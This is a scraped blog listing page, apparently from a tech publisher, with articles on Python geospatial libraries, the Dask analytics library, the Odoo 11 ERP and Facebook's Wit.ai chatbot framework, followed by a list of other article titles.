Engineering and MOB Programming or even go back to the good ol’ waterfall model. Let us know what you think of Agile and how well your organisation has adapted to it, if has adopted it. You can look up some fun discussions about whether it works or sucks on Hacker news: In a nutshell, why do a lot of developers dislike Agile? Poor Man’s Agile: Scrum in 5 Simple Steps What is Mob Programming? 5 things that will matter in application development in 2018 Chaos Engineering: managing complexity by breaking things

0
2
4875

article-image-libraries-for-geospatial-analysis

Aarthi Kumaraswamy

22 May 2018

12 min read

Top 7 libraries for geospatial analysis

Aarthi Kumaraswamy

22 May 2018

12 min read

The term geospatial refers to finding information that is located on the earth's surface. This can include, for example, the position of a cellphone tower, the shape of a road, or the outline of a country. Geospatial data often associates some piece of information with a particular location. Geospatial development is the process of writing computer programs that can access, manipulate, and display this type of information. Internally, geospatial data is represented as a series of coordinates, often in the form of latitude and longitude values. Additional attributes, such as temperature, soil type, height, or the name of a landmark, are also often present. There can be many thousands (or even millions) of data points for a single set of geospatial data. In addition to the prosaic tasks of importing geospatial data from various external file formats and translating data from one projection to another, geospatial data can also be manipulated to solve various interesting problems. Obvious examples include the task of calculating the distance between two points, calculating the length of a road, or finding all data points within a given radius of a selected point. We use libraries to solve all of these problems and more. Today we will look at the major libraries used to process and analyze geospatial data. GDAL/OGR GEOS Shapely Fiona Python Shapefile Library (pyshp) pyproj Rasterio GeoPandas This is an excerpt from the book, Mastering Geospatial Analysis with Python by Paul Crickard, Eric van Rees, and Silas Toms. Geospatial Data Abstraction Library (GDAL) and the OGR Simple Features Library The Geospatial Data Abstraction Library (GDAL)/OGR Simple Features Library combines two separate libraries that are generally downloaded together as a GDAL. This means that installing the GDAL package also gives access to OGR functionality. The reason GDAL is covered first is that other packages were written after GDAL, so chronologically, it comes first. As you will notice, some of the packages covered in this post extend GDAL's functionality or use it under the hood. GDAL was created in the 1990s by Frank Warmerdam and saw its first release in June 2000. Later, the development of GDAL was transferred to the Open Source Geospatial Foundation (OSGeo). Technically, GDAL is a little different than your average Python package as the GDAL package itself was written in C and C++, meaning that in order to be able to use it in Python, you need to compile GDAL and its associated Python bindings. However, using conda and Anaconda makes it relatively easy to get started quickly. Because it was written in C and C++, the online GDAL documentation is written in the C++ version of the libraries. For Python developers, this can be challenging, but many functions are documented and can be consulted with the built-in pydoc utility, or by using the help function within Python. Because of its history, working with GDAL in Python also feels a lot like working in C++ rather than pure Python. For example, a naming convention in OGR is different than Python's since you use uppercase for functions instead of lowercase. These differences explain the choice for some of the other Python libraries such as Rasterio and Shapely, which are also covered in this chapter, that has been written from a Python developer's perspective but offer the same GDAL functionality. GDAL is a massive and widely used data library for raster data. It supports the reading and writing of many raster file formats, with the latest version counting up to 200 different file formats that are supported. Because of this, it is indispensable for geospatial data management and analysis. Used together with other Python libraries, GDAL enables some powerful remote sensing functionalities. It's also an industry standard and is present in commercial and open source GIS software. The OGR library is used to read and write vector-format geospatial data, supporting reading and writing data in many different formats. OGR uses a consistent model to be able to manage many different vector data formats. You can use OGR to do vector reprojection, vector data format conversion, vector attribute data filtering, and more. GDAL/OGR libraries are not only useful for Python programmers but are also used by many GIS vendors and open source projects. The latest GDAL version at the time of writing is 2.2.4, which was released in March 2018. GEOS The Geometry Engine Open Source (GEOS) is the C/C++ port of a subset of the Java Topology Suite (JTS) and selected functions. GEOS aims to contain the complete functionality of JTS in C++. It can be compiled on many platforms, including Python. As you will see later on, the Shapely library uses functions from the GEOS library. In fact, there are many applications using GEOS, including PostGIS and QGIS. GeoDjango, also uses GEOS, as well as GDAL, among other geospatial libraries. GEOS can also be compiled with GDAL, giving OGR all of its capabilities. The JTS is an open source geospatial computational geometry library written in Java. It provides various functionalities, including a geometry model, geometric functions, spatial structures and algorithms, and i/o capabilities. Using GEOS, you have access to the following capabilities—geospatial functions (such as within and contains), geospatial operations (union, intersection, and many more), spatial indexing, Open Geospatial Consortium (OGC) well-known text (WKT) and well-known binary (WKB) input/output, the C and C++ APIs, and thread safety. Shapely Shapely is a Python package for manipulation and analysis of planar features, using functions from the GEOS library (the engine of PostGIS) and a port of the JTS. Shapely is not concerned with data formats or coordinate systems but can be readily integrated with such packages. Shapely only deals with analyzing geometries and offers no capabilities for reading and writing geospatial files. It was developed by Sean Gillies, who was also the person behind Fiona and Rasterio. Shapely supports eight fundamental geometry types that are implemented as a class in the shapely.geometry module—points, multipoints, linestrings, multilinestrings, linearrings, multipolygons, polygons, and geometrycollections. Apart from representing these geometries, Shapely can be used to manipulate and analyze geometries through a number of methods and attributes. Shapely has mainly the same classes and functions as OGR while dealing with geometries. The difference between Shapely and OGR is that Shapely has a more Pythonic and very intuitive interface, is better optimized, and has a well-developed documentation. With Shapely, you're writing pure Python, whereas with GEOS, you're writing C++ in Python. For data munging, a term used for data management and analysis, you're better off writing in pure Python rather than C++, which explains why these libraries were created. For more information on Shapely, consult the documentation. This page also has detailed information on installing Shapely for different platforms and how to build Shapely from the source for compatibility with other modules that depend on GEOS. This refers to the fact that installing Shapely will require you to upgrade NumPy and GEOS if these are already installed. Fiona Fiona is the API of OGR. It can be used for reading and writing data formats. The main reason for using it instead of OGR is that it's closer to Python than OGR as well as more dependable and less error-prone. It makes use of two markup languages, WKT and WKB, for representing spatial information with regards to vector data. As such, it can be combined well with other Python libraries such as Shapely, you would use Fiona for input and output, and Shapely for creating and manipulating geospatial data. While Fiona is Python compatible and our recommendation, users should also be aware of some of the disadvantages. It is more dependable than OGR because it uses Python objects for copying vector data instead of C pointers, which also means that they use more memory, which affects the performance. Python shapefile library (pyshp) The Python shapefile library (pyshp) is a pure Python library and is used to read and write shapefiles. The pyshp library's sole purpose is to work with shapefiles—it only uses the Python standard library. You cannot use it for geometric operations. If you're only working with shapefiles, this one-file-only library is simpler than using GDAL. pyproj The pyproj is a Python package that performs cartographic transformations and geodetic computations. It is a Cython wrapper to provide Python interfaces to PROJ.4 functions, meaning you can access an existing library of C code in Python. PROJ.4 is a projection library that transforms data among many coordinate systems and is also available through GDAL and OGR. The reason that PROJ.4 is still popular and widely used is two-fold: Firstly, because it supports so many different coordinate systems Secondly, because of the routes it provides to do this—Rasterio and GeoPandas, two Python libraries covered next, both use pyproj and thus PROJ.4 functionality under the hood The difference between using PROJ.4 separately instead of using it with a package such as GDAL is that it enables you to re-project individual points, and packages using PROJ.4 do not offer this functionality. The pyproj package offers two classes—the Proj class and the Geod class. The Proj class performs cartographic computations, while the Geod class performs geodetic computations. Rasterio Rasterio is a GDAL and NumPy-based Python library for raster data, written with the Python developer in mind instead of C, using Python language types, protocols, and idioms. Rasterio aims to make GIS data more accessible to Python programmers and helps GIS analysts learn important Python standards. Rasterio relies on concepts of Python rather than GIS. Rasterio is an open source project from the satellite team of Mapbox, a provider of custom online maps for websites and applications. The name of this library should be pronounced as raster-i-o rather than ras-te-rio. Rasterio came into being as a result of a project called the Mapbox Cloudless Atlas, which aimed to create a pretty-looking basemap from satellite imagery. One of the software requirements was to use open source software and a high-level language with handy multi-dimensional array syntax. Although GDAL offers proven algorithms and drivers, developing with GDAL's Python bindings feels a lot like C++. Therefore, Rasterio was designed to be a Python package at the top, with extension modules (using Cython) in the middle, and a GDAL shared library on the bottom. Other requirements for the raster library were being able to read and write NumPy ndarrays to and from data files, use Python types, protocols, and idioms instead of C or C++ to free programmers from having to code in two languages. For georeferencing, Rasterio follows the lead of pyproj. There are a couple of capabilities added on top of reading and writing, one of them being a features module. Reprojection of geospatial data can be done with the rasterio.warp module. Rasterio's project homepage can be found on Github. GeoPandas GeoPandas is a Python library for working with vector data. It is based on the pandas library that is part of the SciPy stack. SciPy is a popular library for data inspection and analysis, but unfortunately, it cannot read spatial data. GeoPandas was created to fill this gap, taking pandas data objects as a starting point. The library also adds functionality from geographical Python packages. GeoPandas offers two data objects—a GeoSeries object that is based on a pandas Series object and a GeoDataFrame, based on a pandas DataFrame object, but adding a geometry column for each row. Both GeoSeries and GeoDataFrame objects can be used for spatial data processing, similar to spatial databases. Read and write functionality is provided for almost every vector data format. Also, because both Series and DataFrame objects are subclasses from pandas data objects, you can use the same properties to select or subset data, for example .loc or .iloc. GeoPandas is a library that employs the capabilities of newer tools, such as Jupyter Notebooks, pretty well, whereas GDAL enables you to interact with data records inside of vector and raster datasets through Python code. GeoPandas takes a more visual approach by loading all records into a GeoDataFrame so that you can see them all together on your screen. The same goes for plotting data. These functionalities were lacking in Python 2 as developers were dependent on IDEs without extensive data visualization capabilities which are now available with Jupyter Notebooks. We've provided an overview of the most important open source packages for processing and analyzing geospatial data. The question then becomes when to use a certain package and why. GDAL, OGR, and GEOS are indispensable for geospatial processing and analyzing, but were not written in Python, and so they require Python binaries for Python developers. Fiona, Shapely, and pyproj were written to solve these problems, as well as the newer Rasterio library. For a more Pythonic approach, these newer packages are preferable to the older C++ packages with Python binaries (although they're used under the hood). Now that you have an idea of what options are available for a certain use case and why one package is preferable over another, here’s something you should always remember. As is often the way in programming, there might be multiple solutions for one particular problem. For example, when dealing with shapefiles, you could use pyshp, GDAL, Shapely, or GeoPandas, depending on your preference and the problem at hand. Introduction to Data Analysis and Libraries 15 Useful Python Libraries to make your Data Science tasks Easier “Pandas is an effective tool to explore and analyze data”: An interview with Theodore Petrou Using R to implement Kriging – A Spatial Interpolation technique for Geostatistics data

0
0
18691

article-image-dask-library-scalable-analytics-python

Amey Varangaonkar

22 May 2018

6 min read

Introducing Dask: The library that makes scalable analytics in Python easier

Amey Varangaonkar

22 May 2018

6 min read

Python’s rise as the preferred language of choice in Data Science is unprecedented, but not really unexpected. Apart from being a general-purpose language which can be used for a variety of tasks - from scripting to networking, Python offers a rich suite of libraries for general data science tasks such as scientific computing, data visualization, and more. However, one big challenge faced by the data scientists is that these packages are not designed for scale. This is crucial in today’s Big Data era where tons of data needs to be processed and analyzed on the go. A platform which supports the existing Python ecosystem and allows it to scale across multiple machines and clusters without affecting the performance was conspicuously missing. Enter Dask. What is Dask? Dask is a flexible parallel computing library written in Python for analytics, designed mainly to offer scalability and enhanced power to the existing packages and libraries. It allows the users to integrate their existing Python-based projects written in popular libraries such as NumPy, SciPy, pandas, and more. Architecture is demonstrated in the diagram below: Architecture (Image courtesy: Slideshare) The 2 key components of Dask that interact with the Python libraries are: Dynamic task schedulers - which takes care of the intensive computational workloads ‘Big Data’ Dask collections - consisting of dataframes, parallel arrays and interfaces that allow for the computations to run on distributed environments Why use Dask? Given there are already quite a few distributed platforms for large-scale data processing such as Apache Spark, Apache Storm, Flink and so on, why and when should one go for Dask? What are the advantages offered by this Python library? Let us take a look at the 4 major reasons to prefer Dask for distributed, scalable analytics in Python: Easy to get started: If you are an existing Python user, you must have already worked with popular Python packages such as NumPy, SciPy, matplotlib, scikit-learn, pandas, and more. Dask offers a similar, intuitive interface and since it is a part of the bigger Python ecosystem, getting started with Dask is very easy. It uses the existing Python APIs to switch between the popular packages and their Dask-equivalents, so you don’t have to spend a lot of time in porting the code. For absolute beginners, using Dask for scalable analytics would be an easier and logical option to pursue, once they have grasped the fundamentals of Python and the associated libraries. Scales up and down quite easily: You can run your project on Dask on a single machine, or on a cluster with thousands of cores without essentially affecting the speed and performance of your code. Dask uses the multi-core CPUs within a single system optimally to process hundreds of terabytes of data without the need for additional hardware. Similarly, for moderate to large datasets spanning 100+ gigabytes which often don’t fit into a single storage device, the computing power of the clusters can be coupled with Dask for effective analytics. Supports complex applications: Many companies tend to tackle complex computations by introducing custom codes that run on popular Big Data tools such as Hadoop MapReduce and Apache Spark. However, with the help of the dynamic task schedule feature of Dask, it is now possible to run and process complex applications without introducing any additional code. Dask is solely responsible for the smooth handling of various tasks such as network communication, load balancing and diagnostics, among the others. Clear, responsive, real-time feedback: One of the most important features of Dask is its user-friendliness. Dask provides a real-time dashboard that highlights the key metrics of the processing task undertaken by the user - such as the current progress of your project, memory consumption and more. It also offers an in-built IPython kernel that allows the user to investigate the ongoing computation with just a terminal. How Dask compares with Apache Spark Apache Spark is one of the most popular and widely used Big Data tools for distributed data processing and analytics. Dask and Apache Spark have many features in common, prompting us and many other developers to ask the question - which tool is better? While Spark has been around for quite some and has many standard, stable features over years of development, Dask is quite new and is still being improved as a tool. We summarize the important differences between Dask and Apache Spark in the table below: CriteriaApache SparkDaskPrimary languageScalaPythonScaleSupports a single node to thousands of nodes in the clusterSupports a single node to thousands of nodes in the clusterEcosystemAll-in-one self-sufficient ecosystemIntegration with popular libraries within the Python ecosystemFlexibilityLowHighStream processingBuilt-in module called Spark Streaming presentReal-time interface which is pretty low-level, requires more work than Apache SparkGraph processingPossible with GraphX moduleNot possibleMachine learningUses the Spark MLlib moduleIntegrates with scikit-learn and XGBoostPopularityVery high, commonly used tool in the Big Data ecosystemFairly new tool but has already found its place in the pandas, scikit-learn and Jupyter stack You can read a detailed comparison of Apache Spark and Dask on the official Dask documentation page. What we can expect from Dask As we saw from the comparison above, it is fairly easy to port an existing Python project using several high-profile Python libraries such as NumPy, scikit-learn and more. Python developers and data scientists will appreciate the high flexibility and complex computational capabilities offered by Dask. The limited stream processing and graph processing features are big areas of improvement, but we can expect some developments in this domain in the near future. Even though Dask is still relatively new, it looks very promising due to its close affinity with the Python ecosystem. With Python’s clout rising, many people would prefer a Python-based data processing tool which works at scale, without having to switch to an external Big Data framework. Dask may well be the superhero to come to the developers’ rescue, in such cases. You can learn more about the latest developments in Dask on their official GitHub page. Read more Is Apache Spark today’s Hadoop? Apache Spark 2.3 now has native Kubernetes support! Should you move to Python 3? 7 Python experts’ opinions

0
0
3529

Sugandha Lahoti

22 May 2018

3 min read

ERP tool in focus: Odoo 11

Sugandha Lahoti

22 May 2018

3 min read

What is Odoo? Odoo is an all-in-one management software that offers a range of business applications. It forms a complete suite of enterprise management applications targeting companies of all sizes. It is versatile in the sense that it can be used across multiple categories including CRM, website, e-commerce, billing, accounting, manufacturing, warehouse, and project management, and inventory. The community version is free-of-charge and can be installed with ease. Odoo is one of the fastest growing open source, business application development software products available. With the announcement of version 11 of Odoo, there are many new features added to Odoo and the face of business application development with Odoo has changed. In Odoo 11, the online installation documentation continues to improve and there are now options for Docker installations. In addition, Odoo 11 uses Python 3 instead of Python 2.7. This will not change the steps you take in installing Odoo but will change the specific libraries that will be installed. While much of the process is the same as previous versions of Odoo, there have been some pricing changes in Odoo 11. There are only two free users now and you pay for additional users. There is one free application that you can install for an unlimited number of users, but as soon as you have more than one application, then you must pay $25 for each user, including the first user. If you have thought about developing in Odoo, now is the best time to start. Before I convince you on why Odoo is great, let’s take a step back and revisit our fundamentals. What is an ERP? ERP is an acronym often used for Enterprise Resource Planning. The ERP gives a global and real-time view of data that can enable companies to address concerns and drive improvements. It automates the core business operations such as the order to fulfillment and procures to pay processes. It also reduces risk management for companies and enhances customer services by providing a single source for billing and relationship tracking. Why Odoo? Odoo is Extensible and easy to customize Odoo's framework was built with extensibility in mind. Extensions and modifications can be implemented as modules, to be applied over the module with the feature being changed, without actually changing it. This provides a clean and easy-to-control and customized applications. You get integrated information Instead of distributing data throughout several separate databases, Odoo maintains a single location for all the data. Moreover, the data remains consistent and up to date. Single reporting system Odoo has a unified and single reporting system to analyze and track the status. Users can also run their own reports without any help from IT. Single reporting systems, such as those provided by Odoo ERP software helps make reporting easier and customizable. Built around Python Odoo is built using the Python programming language, which is one of the most popular languages used by developers. Large community The capability to combine several modules into feature-rich applications, along with the open source nature of Odoo, is probably the important factors explaining the community that has grown around Odoo. In fact, there are thousands of community modules available for Odoo, covering virtually every topic, and the number of people getting involved has been steadily growing every year. Go through our video, Odoo 11 development essentials to learn to scaffold a new module, create new models, and use the proper functions that make Odoo 11 the best ERP out there. Top 5 free Business Intelligence tools How to build a live interactive visual dashboard in Power BI with Azure Stream Tableau 2018.1 brings new features to help organizations easily scale analytics

0
0
4369

article-image-facebooks-wit-ai-why-we-need-yet-another-chatbot-development-framework

Sunith Shetty

21 May 2018

4 min read

Facebook’s Wit.ai: Why we need yet another chatbot development framework?

Sunith Shetty

21 May 2018

4 min read

Chatbots are remarkably changing the way customer service is provided in a variety of industries. For every organization, customer satisfaction plays a very important role, thus they expect business to be reachable any time and respond to their queries 24*7. With growing artificial intelligence advances in smart devices and IoT, chatbots are becoming a necessity for communicating with customers in real time. There are many existing vendors such as Google, Microsoft, Amazon, and IBM with the required models and services to build conversational interfaces for the applications and devices. But the chatbot industry is evolving and even minor improvements in the UI, or the algorithms that work behind the scenes or the data they use to get trained, can mean a major win. With complete backing by the Facebook team, we can expect Wit.ai creating new simplified ways to ease speech recognition and voice interface for developers. Wit.ai has an excellent support for NLP making it one of the popular bot frameworks in the market. The key to chatbot success is to pursue continuous learning that enables them to leverage relevant data in order to connect with clearly defined customers, this what makes Wit.ai extra special. What is Wit.ai? Wit.ai is an open and extensible NLP engine for developers, acquired by Facebook, which allows you to build conversational applications and devices that you can talk or text to. It provides an easy interface and quick learning APIs to understand human communication from every interaction and helps to parse the complex message (which can be either voice or text) into structured data. It also helps you with predicting the forthcoming set of events based on the learning from the gathered data. Why Wit.ai It is one of the most powerful APIs used to understand natural language It is a free SaaS platform that provides services for developers to build a chatbot for their app or device. It has story support thus allowing you to visualize the user experience. A new built-in support NLP integration with the Page inbox allows the page admins to create a Wit app with ease. Further by using the anonymized samples from past messages, the bot provides automate responses to the most common requests asked. You can create efficient and powerful text or voice based conversational bots that humans can chat with. In addition to business bots, these APIs can be used to build hands-free voice interfaces for mobile phones, wearable devices, home automation products and more. It can be used in platforms that learn new commands semantically to those input by the developer. It provides a developer GUI which includes a visual representation of the conversation flows, business logic invocations, context variables, jumps, and branching logic. Programming language and integration support - Node.js client, Python client, Ruby client, and HTTP API. Challenges in Wit.ai Wit.ai doesn’t support third-party integration tools. Wit.ai has no required slot/parameter feature. Thus you will have to invoke business logic every time there is an interaction with the user in order to gather any missing information not spoken by the user. Training the engine can take some time based on the task performed. When the number of stories increases, Wit engine becomes slower. However, existing Wit.ai adoption looks very promising, with more than 160,000 members in the community contributing on GitHub. In order to have a complete coverage of tutorials, documentation and client support APIs you can visit the Github page to see a list of repositories. My friend, the robot: Artificial Intelligence needs Emotional Intelligence Snips open sources Snips NLU, its Natural Language Understanding engine What can Google Duplex do for businesses?

0
0
8099

article-image-tools-for-reinforcement-learning

Pravin Dhandre

21 May 2018

4 min read

Top 5 tools for reinforcement learning

Pravin Dhandre

21 May 2018

4 min read

0
0
18179

Pentest tool in focus: Metasploit

What is Android Studio and how does it differ from other IDEs?

Four self-service business intelligence user types in Qlik Sense

Does AI deserve to be so Overhyped?

Python web development: Django vs Flask in 2018

AI for game developers: 7 ways AI can take your game to the next level

12 common malware types you should know

What the Python Software Foundation & Jetbrains 2017 Python Developer Survey had to reveal

Anatomy of a Crypto Ransomware

Abandoning Agile

Trending Topics

Top 7 libraries for geospatial analysis

Introducing Dask: The library that makes scalable analytics in Python easier

ERP tool in focus: Odoo 11

Facebook’s Wit.ai: Why we need yet another chatbot development framework?

Top 5 tools for reinforcement learning